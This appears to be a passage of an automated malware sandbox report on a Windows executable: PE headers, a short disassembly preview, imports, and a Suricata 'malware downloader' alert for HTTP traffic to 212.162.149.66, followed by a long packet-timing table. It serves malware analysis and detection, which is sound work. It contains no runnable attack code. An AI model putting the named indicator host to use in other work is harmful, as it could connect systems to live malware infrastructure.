                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                        Time Stamp:0x660843F3 [Sat Mar 30 16:55:15 2024 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:f4639a0b3116c2cfc71144b88a929cfd

                                        Entrypoint Preview

                                        Instruction
                                        sub esp, 000003F8h
                                        push ebp
                                        push esi
                                        push edi
                                        push 00000020h
                                        pop edi
                                        xor ebp, ebp
                                        push 00008001h
                                        mov dword ptr [esp+20h], ebp
                                        mov dword ptr [esp+18h], 0040A2D8h
                                        mov dword ptr [esp+14h], ebp
                                        call dword ptr [004080A4h]
                                        mov esi, dword ptr [004080A8h]
                                        lea eax, dword ptr [esp+34h]
                                        push eax
                                        mov dword ptr [esp+4Ch], ebp
                                        mov dword ptr [esp+0000014Ch], ebp
                                        mov dword ptr [esp+00000150h], ebp
                                        mov dword ptr [esp+38h], 0000011Ch
                                        call esi
                                        test eax, eax
                                        jne 00007FEA4CBA9D7Ah
                                        lea eax, dword ptr [esp+34h]
                                        mov dword ptr [esp+34h], 00000114h
                                        push eax
                                        call esi
                                        mov ax, word ptr [esp+48h]
                                        mov ecx, dword ptr [esp+62h]
                                        sub ax, 00000053h
                                        add ecx, FFFFFFD0h
                                        neg ax
                                        sbb eax, eax
                                        mov byte ptr [esp+0000014Eh], 00000004h
                                        not eax
                                        and eax, ecx
                                        mov word ptr [esp+00000148h], ax
                                        cmp dword ptr [esp+38h], 0Ah
                                        jnc 00007FEA4CBA9D48h
                                        and word ptr [esp+42h], 0000h
                                        mov eax, dword ptr [esp+40h]
                                        movzx ecx, byte ptr [esp+3Ch]
                                        mov dword ptr [00429AD8h], eax
                                        xor eax, eax
                                        mov ah, byte ptr [esp+38h]
                                        movzx eax, ax
                                        or eax, ecx
                                        xor ecx, ecx
                                        mov ch, byte ptr [esp+00000148h]
                                        movzx ecx, cx
                                        shl eax, 10h
                                        or eax, ecx
                                        movzx ecx, byte ptr [esp+0000004Eh]

                                        Rich Headers

                                        Programming Language:
                                        • [EXP] VC++ 6.0 SP5 build 8804

                                        Data Directories

                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x84fc0xa0.rdata
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x4d0000x1f780.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0x80000x2a8.rdata
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                        Sections

                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        .text0x10000x65760x66001e4066ed6e7440cc449c401dfd9ca64fFalse0.6663219975490197data6.461246686118911IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                        .rdata0x80000x13580x1400f0b500ff912dda10f31f36da3efc8a1eFalse0.44296875data5.102094016108248IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .data0xa0000x1fb380x6002e1d49b2855a89e6218e118f0c182b81False0.5026041666666666data4.044293204800279IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .ndata0x2a0000x230000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .rsrc0x4d0000x1f7800x1f8008e8a3197e2686a2d1e03890bd5970dadFalse0.5309554811507936data6.149455977169068IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                        Resources

                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                        RT_ICON0x4d2f80x10828Device independent bitmap graphic, 128 x 256 x 32, image size 0EnglishUnited States0.25881343901573406
                                        RT_ICON0x5db200x9f42PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9983811626195732
                                        RT_ICON0x67a680x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.4413900414937759
                                        RT_ICON0x6a0100x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.5112570356472795
                                        RT_ICON0x6b0b80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0EnglishUnited States0.6077868852459016
                                        RT_ICON0x6ba400x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.650709219858156
                                        RT_DIALOG0x6bea80x100dataEnglishUnited States0.5234375
                                        RT_DIALOG0x6bfa80x11cdataEnglishUnited States0.6056338028169014
                                        RT_DIALOG0x6c0c80xc4dataEnglishUnited States0.5918367346938775
                                        RT_DIALOG0x6c1900x60dataEnglishUnited States0.7291666666666666
                                        RT_GROUP_ICON0x6c1f00x5adataEnglishUnited States0.7888888888888889
                                        RT_VERSION0x6c2500x1f0MS Windows COFF PowerPC object fileEnglishUnited States0.5504032258064516
                                        RT_MANIFEST0x6c4400x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795

                                        Imports

                                        DLLImport
                                        ADVAPI32.dllRegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW
                                        SHELL32.dllSHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW, ShellExecuteExW
                                        ole32.dllCoCreateInstance, OleUninitialize, OleInitialize, IIDFromString, CoTaskMemFree
                                        COMCTL32.dllImageList_Destroy, ImageList_AddMasked, ImageList_Create
                                        USER32.dllMessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, CreatePopupMenu, AppendMenuW, TrackPopupMenu, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, IsWindowEnabled, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CharPrevW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, CharNextA, wsprintfA, DispatchMessageW, CreateWindowExW, PeekMessageW, GetSystemMetrics
                                        GDI32.dllGetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor
                                        KERNEL32.dlllstrcmpiA, CreateFileW, GetTempFileNameW, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, WriteFile, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, Sleep, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, MulDiv, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, SetEnvironmentVariableW

                                        Possible Origin

                                        Language of compilation systemCountry where language is spokenMap
                                        EnglishUnited States

                                        Network Behavior

                                        Suricata IDS Alerts

                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                        2024-12-10T14:09:52.971466+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1049707212.162.149.6680TCP

                                        Network Port Distribution

                                        TCP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Dec 10, 2024 14:09:51.546360016 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:51.671773911 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:51.672040939 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:51.673574924 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:51.795128107 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:52.971339941 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:52.971466064 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:52.971940994 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:52.971949100 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:52.971956968 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:52.971993923 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:52.972007990 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:52.972019911 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:52.972042084 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:52.972043991 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:52.972136974 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:52.973244905 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:52.973445892 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:52.973633051 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:52.973639965 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:52.973645926 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:52.973712921 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.127928972 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.129810095 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.138727903 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.141444921 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.141676903 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.141684055 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.141736031 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.148200035 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.148206949 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.148258924 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.157284975 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.157291889 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.157346964 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.165158033 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.165294886 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.165383101 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.174262047 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.174269915 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.174319983 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.182152033 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.182400942 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.182511091 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.190587044 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.190875053 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.191051960 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.199368954 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.199428082 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.199634075 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.199693918 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.207480907 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.207606077 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.207721949 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.257169008 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.259150028 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.261123896 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.263415098 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.263592005 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.263598919 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.263643980 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.271814108 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.271821022 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.271913052 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.280205011 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.280328035 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.280384064 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.290381908 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.290390015 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.290467024 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.297624111 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.297632933 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.297755003 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.305977106 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.305990934 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.306047916 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.314301968 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.314644098 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.314713001 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.322598934 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.322693110 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.322787046 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.331244946 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.331253052 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.331340075 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.339653969 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.339900017 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.339955091 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.348059893 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.348432064 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.348448992 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.348480940 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.356560946 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.356754065 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.356837034 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.379698992 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.379705906 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.379800081 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.383691072 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.383702040 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.383766890 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.386107922 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.386178017 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.386349916 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.387414932 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.390342951 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.390348911 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.390558958 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.394541979 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.395056009 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.395102024 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.399081945 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.399091959 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.399219036 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.403130054 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.403136969 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.403184891 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.407753944 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.407761097 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.407826900 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.412312984 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.412319899 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.412364960 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.416291952 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.416410923 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.416487932 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.420455933 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.420610905 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.420667887 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.424940109 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.425055027 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.425126076 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.429106951 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.429205894 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.429250002 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.433415890 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.433703899 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.433789015 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.437781096 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.437943935 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.438005924 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.442337990 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.442729950 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.442792892 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.446377993 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.446444035 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.446491957 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.450697899 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.450705051 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.450756073 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.454658031 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.454731941 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.454762936 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.454806089 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.458839893 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.458858013 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.458935976 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.496375084 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.496397972 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.496483088 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.498343945 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.498349905 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.498431921 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.501791954 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.501945019 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.501998901 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.505955935 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.506055117 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.506098986 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.510485888 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.510579109 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.510649920 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.513432026 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.513438940 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.513509035 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.516706944 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.516817093 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.516859055 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.519648075 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.520108938 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.520152092 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.522551060 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.522614956 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.522833109 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.522870064 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.525324106 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.525599003 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.525665998 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.528162956 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.528472900 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.528526068 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.530914068 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.530967951 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.531024933 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.531419039 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.533694983 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.533704042 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.533752918 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.536334991 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.536389112 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.536483049 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.536537886 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.538909912 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.538964987 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.538996935 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.539408922 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.542088985 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.542095900 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.542165041 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.544187069 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.544194937 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.544233084 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.546550035 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.546587944 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.546700001 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.547056913 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.548969984 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.549248934 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.549304962 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.551263094 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.551270008 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.551356077 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.553817987 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.553829908 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.553951979 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.555949926 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.556086063 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.587212086 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.587280989 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.587523937 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.587625980 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.588197947 CET8049707212.162.149.66192.168.2.10
